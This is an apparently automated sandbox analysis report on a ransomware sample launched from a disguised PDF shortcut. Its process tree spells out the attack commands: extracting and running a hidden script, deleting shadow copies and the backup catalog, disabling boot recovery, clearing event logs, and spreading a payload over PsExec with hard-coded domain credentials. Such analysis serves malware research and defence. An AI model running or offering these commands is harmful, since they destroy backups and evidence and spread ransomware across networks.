Overview

Score  Task / sample                 Platform
10     Static                        static
6      0d7dc074be...41c.js           windows7_x64
7      0d7dc074be...41c.js           windows10_x64
7      3b7cd07e87...ce.lnk           windows7_x64
10     3b7cd07e87...ce.lnk           windows10_x64
10     79e21ff914...3c.exe           windows7_x64
1      79e21ff914...3c.exe           windows10_x64
1      83c375dcda...90.lnk           windows7_x64
10     83c375dcda...90.lnk           windows10_x64
10     a81f152a31...5d.exe           windows7_x64
10     a81f152a31...5d.exe           windows10_x64
1      c7cf5c62ec...20.lnk           windows7_x64
10     c7cf5c62ec...20.lnk           windows10_x64
10     db5d09edc2...f1.lnk           windows7_x64
10     db5d09edc2...f1.lnk           windows10_x64
10     e678ec3dbc...2f.exe           windows7_x64
1      e678ec3dbc...2f.exe           windows10_x64
1      f5f79e2169...9e.lnk           windows7_x64
10     f5f79e2169...9e.lnk           windows10_x64
Analysis

Score: 10
Max time kernel: 150s
Max time network: 151s
Platform: windows10_x64
Resource: win10v20201028
Submitted: 26-12-2020 20:21
Tasks

Static task static1
Behavioral task behavioral1: sample 0d7dc074be83f1096f39ba95bfc4e1a17c411dbed0e5eeeb48e88a12d79b541c.js, resource win7v20201028
Behavioral task behavioral2: sample 0d7dc074be83f1096f39ba95bfc4e1a17c411dbed0e5eeeb48e88a12d79b541c.js, resource win10v20201028
Behavioral task behavioral3: sample 3b7cd07e87902deae4b482e987dea9e25a93a55ec783884e8b466dc55c346bce.lnk, resource win7v20201028
Behavioral task behavioral4: sample 3b7cd07e87902deae4b482e987dea9e25a93a55ec783884e8b466dc55c346bce.lnk, resource win10v20201028
Behavioral task behavioral5: sample 79e21ff9142821b2e3d6e3dc8d812e86da231dbbd1217415b4add748a4c1ce3c.exe, resource win7v20201028
Behavioral task behavioral6: sample 79e21ff9142821b2e3d6e3dc8d812e86da231dbbd1217415b4add748a4c1ce3c.exe, resource win10v20201028
Behavioral task behavioral7: sample 83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90.lnk, resource win7v20201028
Behavioral task behavioral8: sample 83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90.lnk, resource win10v20201028
Behavioral task behavioral9: sample a81f152a31c03b45dbcf29439050bbe080b1f6308b032aebc0205886d1f41e5d.exe, resource win7v20201028
Behavioral task behavioral10: sample a81f152a31c03b45dbcf29439050bbe080b1f6308b032aebc0205886d1f41e5d.exe, resource win10v20201028
Behavioral task behavioral11: sample c7cf5c62ecfade27338acb2cc91a06c2615dbb97711f2558a9379ee8a5306720.lnk, resource win7v20201028
Behavioral task behavioral12: sample c7cf5c62ecfade27338acb2cc91a06c2615dbb97711f2558a9379ee8a5306720.lnk, resource win10v20201028
Behavioral task behavioral13: sample db5d09edc2e9676a41f26f5f4310df9d13abdae8011b1d37af7139008362d5f1.lnk, resource win7v20201028
Behavioral task behavioral14: sample db5d09edc2e9676a41f26f5f4310df9d13abdae8011b1d37af7139008362d5f1.lnk, resource win10v20201028
Behavioral task behavioral15: sample e678ec3dbccfbd5cf0f303d2841e726ac7628044de5297bf9ebe791d66270a2f.exe, resource win7v20201028
Behavioral task behavioral16: sample e678ec3dbccfbd5cf0f303d2841e726ac7628044de5297bf9ebe791d66270a2f.exe, resource win10v20201028
Behavioral task behavioral17: sample f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk, resource win7v20201028
Behavioral task behavioral18: sample f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk, resource win10v20201028
General

Target: f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
Size: 938KB
MD5: cb908352d719b9e0a7142c4110ae502e
SHA1: e50a8c33b315517a4bad5eb35fb09e572c3ee9fa
SHA256: f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e
SHA512: 9502d7c069532571277e3c8c849e9ce81130a11bf5ad892dad688aa9e53973abc76fb5b53aee72ca37fe29e50aa2543f2681a6d849ada59b9e07ff6e3b574909
Malware Config
Signatures
- Clears Windows event logs (1 TTP)

- Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
  pid   process
  3820  bcdedit.exe
  252   bcdedit.exe

- Deletes backup catalog
Processes:
  pid   process
  3568  wbadmin.exe
- Executes dropped EXE (155 IoCs)
Processes:
  pid   process
  412   vfrkl.exe
  3428  _umx.exe
  4088  _fif.exe
  2600  _fif.exe
  3908  _fif.exe
  3060  _fif.exe
  1856  PSEXESVC.exe
  1892  _ple.exe
  2672  _fif.exe
  3212  _fif.exe
  3236  _fif.exe
  1516  _fif.exe
  2632  _fif.exe
  3120  _fif.exe
  892   _fif.exe
  496   _fif.exe
  188   _ple.exe
  1860  _fif.exe
  1940  _fif.exe
  2340  _fif.exe
  4196  _fif.exe
  4208  _fif.exe
  4344  _ple.exe
  4332  _fif.exe
  4384  _fif.exe
  4424  _fif.exe
  4536  _fif.exe
  4604  _fif.exe
  4716  _fif.exe
  4728  _fif.exe
  4840  _ple.exe
  4816  _fif.exe
  4828  _fif.exe
  4908  _fif.exe
  5024  _fif.exe
  5072  _fif.exe
  5116  _ple.exe
  4152  _fif.exe
  1888  _fif.exe
  2916  _fif.exe
  1032  _fif.exe
  4300  _fif.exe
  4308  _fif.exe
  4212  _fif.exe
  4056  _fif.exe
  4176  _fif.exe
  4360  _fif.exe
  4440  _fif.exe
  4504  _fif.exe
  4596  _fif.exe
  4680  _fif.exe
  4660  _fif.exe
  4784  _fif.exe
  4760  _fif.exe
  4636  _fif.exe
  4856  _fif.exe
  4820  _fif.exe
  4996  _fif.exe
  5052  _fif.exe
  1196  _fif.exe
  5104  _fif.exe
  3796  _fif.exe
  4320  _fif.exe
  4160  _fif.exe
- Drops file in Windows directory (9 IoCs)
Processes:
  description                   ioc                       process
  File created                  C:\Windows\PSEXESVC.exe   _fif.exe
  File created                  C:\Windows\PSEXESVC.exe   _fif.exe
  File opened for modification  C:\Windows\_ple.exe       notepad.exe
  File opened for modification  C:\Windows\_ple.exe       notepad.exe
  File opened for modification  C:\Windows\_ple.exe       notepad.exe
  File opened for modification  C:\Windows\_ple.exe       notepad.exe
  File created                  C:\Windows\PSEXESVC.exe   _fif.exe
  File created                  C:\Windows\PSEXESVC.exe   _fif.exe
  File opened for modification  C:\Windows\_ple.exe       notepad.exe
- Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                                                                        process
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000                              vds.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName                 vds.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000                      vds.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName         vds.exe
- Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid   process
  4000  vssadmin.exe
- Modifies data under HKEY_USERS (296 IoCs)
Processes:
  description      ioc                                                                       process
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software                                          _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals                             _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec                      _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1"   _fif.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
  pid   process
  412   vfrkl.exe
  412   vfrkl.exe
  412   vfrkl.exe
  412   vfrkl.exe
  412   vfrkl.exe
  412   vfrkl.exe
- Suspicious use of AdjustPrivilegeToken (84 IoCs)
Processes:
  description                           pid   process
  Token: SeAssignPrimaryTokenPrivilege  1740  _ftf.exe
  Token: SeIncreaseQuotaPrivilege       1740  _ftf.exe
  Token: SeSecurityPrivilege            1740  _ftf.exe
  Token: SeTakeOwnershipPrivilege       1740  _ftf.exe
  Token: SeLoadDriverPrivilege          1740  _ftf.exe
  Token: SeSystemtimePrivilege          1740  _ftf.exe
  Token: SeBackupPrivilege              1740  _ftf.exe
  Token: SeRestorePrivilege             1740  _ftf.exe
  Token: SeShutdownPrivilege            1740  _ftf.exe
  Token: SeSystemEnvironmentPrivilege   1740  _ftf.exe
  Token: SeUndockPrivilege              1740  _ftf.exe
  Token: SeManageVolumePrivilege        1740  _ftf.exe
  Token: SeDebugPrivilege               412   vfrkl.exe
  Token: SeShutdownPrivilege            3428  _umx.exe
  Token: SeBackupPrivilege              612   vssvc.exe
  Token: SeRestorePrivilege             612   vssvc.exe
  Token: SeAuditPrivilege               612   vssvc.exe
  Token: SeAssignPrimaryTokenPrivilege  1892  _ple.exe
  Token: SeIncreaseQuotaPrivilege       1892  _ple.exe
  Token: SeSecurityPrivilege            1892  _ple.exe
  Token: SeTakeOwnershipPrivilege       1892  _ple.exe
  Token: SeLoadDriverPrivilege          1892  _ple.exe
  Token: SeSystemtimePrivilege          1892  _ple.exe
  Token: SeBackupPrivilege              1892  _ple.exe
  Token: SeRestorePrivilege             1892  _ple.exe
  Token: SeShutdownPrivilege            1892  _ple.exe
  Token: SeSystemEnvironmentPrivilege   1892  _ple.exe
  Token: SeUndockPrivilege              1892  _ple.exe
  Token: SeManageVolumePrivilege        1892  _ple.exe
  Token: SeBackupPrivilege              264   wbengine.exe
  Token: SeRestorePrivilege             264   wbengine.exe
  Token: SeSecurityPrivilege            264   wbengine.exe
  Token: SeAssignPrimaryTokenPrivilege  188   _ple.exe
  Token: SeIncreaseQuotaPrivilege       188   _ple.exe
  Token: SeSecurityPrivilege            188   _ple.exe
  Token: SeTakeOwnershipPrivilege       188   _ple.exe
  Token: SeLoadDriverPrivilege          188   _ple.exe
  Token: SeSystemtimePrivilege          188   _ple.exe
  Token: SeBackupPrivilege              188   _ple.exe
  Token: SeRestorePrivilege             188   _ple.exe
  Token: SeShutdownPrivilege            188   _ple.exe
  Token: SeSystemEnvironmentPrivilege   188   _ple.exe
  Token: SeUndockPrivilege              188   _ple.exe
  Token: SeManageVolumePrivilege        188   _ple.exe
  Token: SeSecurityPrivilege            4220  _fif.exe
  Token: SeBackupPrivilege              4220  _fif.exe
  Token: SeAssignPrimaryTokenPrivilege  4344  _ple.exe
  Token: SeIncreaseQuotaPrivilege       4344  _ple.exe
  Token: SeSecurityPrivilege            4344  _ple.exe
  Token: SeTakeOwnershipPrivilege       4344  _ple.exe
  Token: SeLoadDriverPrivilege          4344  _ple.exe
  Token: SeSystemtimePrivilege          4344  _ple.exe
  Token: SeBackupPrivilege              4344  _ple.exe
  Token: SeRestorePrivilege             4344  _ple.exe
  Token: SeShutdownPrivilege            4344  _ple.exe
  Token: SeSystemEnvironmentPrivilege   4344  _ple.exe
  Token: SeUndockPrivilege              4344  _ple.exe
  Token: SeManageVolumePrivilege        4344  _ple.exe
  Token: SeSecurityPrivilege            4664  wevtutil.exe
  Token: SeBackupPrivilege              4664  wevtutil.exe
  Token: SeAssignPrimaryTokenPrivilege  4840  _ple.exe
  Token: SeIncreaseQuotaPrivilege       4840  _ple.exe
  Token: SeSecurityPrivilege            4840  _ple.exe
  Token: SeTakeOwnershipPrivilege       4840  _ple.exe
- Suspicious use of WriteProcessMemory (519 IoCs)
Processes:
  description                        pid   process       target process
  PID 1108 wrote to memory of 4004   1108  cmd.exe       cmd.exe
  PID 1108 wrote to memory of 4004   1108  cmd.exe       cmd.exe
  PID 4004 wrote to memory of 3988   4004  cmd.exe       cmd.exe
  PID 4004 wrote to memory of 3988   4004  cmd.exe       cmd.exe
  PID 4004 wrote to memory of 3288   4004  cmd.exe       find.exe
  PID 4004 wrote to memory of 3288   4004  cmd.exe       find.exe
  PID 4004 wrote to memory of 3208   4004  cmd.exe       wscript.exe
  PID 4004 wrote to memory of 3208   4004  cmd.exe       wscript.exe
  PID 1352 wrote to memory of 1740   1352  PSEXESVC.exe  _ftf.exe
  PID 1352 wrote to memory of 1740   1352  PSEXESVC.exe  _ftf.exe
  PID 1352 wrote to memory of 1740   1352  PSEXESVC.exe  _ftf.exe
  PID 1740 wrote to memory of 412    1740  _ftf.exe      vfrkl.exe
  PID 1740 wrote to memory of 412    1740  _ftf.exe      vfrkl.exe
  PID 1740 wrote to memory of 3428   1740  _ftf.exe      _umx.exe
  PID 1740 wrote to memory of 3428   1740  _ftf.exe      _umx.exe
  PID 1740 wrote to memory of 3428   1740  _ftf.exe      _umx.exe
  PID 3428 wrote to memory of 3980   3428  _umx.exe      cmd.exe
  PID 3428 wrote to memory of 3980   3428  _umx.exe      cmd.exe
  PID 1740 wrote to memory of 4088   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 4088   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 4088   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 2600   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 2600   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 2600   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3908   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3908   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3908   1740  _ftf.exe      _fif.exe
  PID 3980 wrote to memory of 4000   3980  cmd.exe       vssadmin.exe
  PID 3980 wrote to memory of 4000   3980  cmd.exe       vssadmin.exe
  PID 1740 wrote to memory of 3060   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3060   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3060   1740  _ftf.exe      _fif.exe
  PID 3428 wrote to memory of 2164   3428  _umx.exe      cmd.exe
  PID 3428 wrote to memory of 2164   3428  _umx.exe      cmd.exe
  PID 1740 wrote to memory of 2672   1740  _ftf.exe      _fif.exe
  PID 2164 wrote to memory of 3568   2164  cmd.exe       wbadmin.exe
  PID 2164 wrote to memory of 3568   2164  cmd.exe       wbadmin.exe
  PID 1856 wrote to memory of 1892   1856  PSEXESVC.exe  _ple.exe
  PID 1856 wrote to memory of 1892   1856  PSEXESVC.exe  _ple.exe
  PID 1856 wrote to memory of 1892   1856  PSEXESVC.exe  _ple.exe
  PID 1740 wrote to memory of 2672   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 2672   1740  _ftf.exe      _fif.exe
  PID 1892 wrote to memory of 2872   1892  _ple.exe      notepad.exe
  PID 1892 wrote to memory of 2872   1892  _ple.exe      notepad.exe
  PID 1892 wrote to memory of 2872   1892  _ple.exe      notepad.exe
  PID 1892 wrote to memory of 2872   1892  _ple.exe      notepad.exe
  PID 1892 wrote to memory of 2872   1892  _ple.exe      notepad.exe
  PID 1740 wrote to memory of 3212   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3212   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3212   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3236   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3236   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3236   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 1516   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 1516   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 1516   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 2632   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 2632   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 2632   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3120   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3120   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 3120   1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 892    1740  _ftf.exe      _fif.exe
  PID 1740 wrote to memory of 892    1740  _ftf.exe      _fif.exe
Processes

Process tree. The bracketed number is the depth of the entry in the tree; each entry gives the image path, then the command line it was started with, then the signatures that matched it.

[1] C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\f5f79e2169db3bbe7b7ae3ff4a0f40659d11051e69ee784f5469659a708e829e.lnk
    - Suspicious use of WriteProcessMemory

[2] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "VerificationDocuments.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"
    - Suspicious use of WriteProcessMemory

[3] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""

[3] C:\Windows\system32\find.exe
    find "END2"

[3] C:\Windows\system32\wscript.exe
    wscript "C:\Users\Admin\AppData\Local\Temp\0.js"

[1] C:\Windows\PSEXESVC.exe
    C:\Windows\PSEXESVC.exe
    - Suspicious use of WriteProcessMemory

[2] C:\Windows\_ftf.exe
    "_ftf.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[3] C:\Windows\TEMP\vfrkl.exe
    123 \\.\pipe\280E9885-CDBC-4DAE-8FA4-2E26A1A5442E
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Windows\TEMP\_umx.exe
    "C:\Windows\TEMP\_umx.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
    - Suspicious use of WriteProcessMemory

[5] \??\c:\Windows\system32\vssadmin.exe
    c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
    - Interacts with shadow copies

[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
    - Suspicious use of WriteProcessMemory

[5] C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    - Deletes backup catalog

[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

[5] C:\Windows\system32\bcdedit.exe
    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    - Modifies boot configuration data using bcdedit

[5] C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    - Modifies boot configuration data using bcdedit

[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe cl System

[5] C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl System

[4] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security

[5] C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Security
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.65 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.94 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
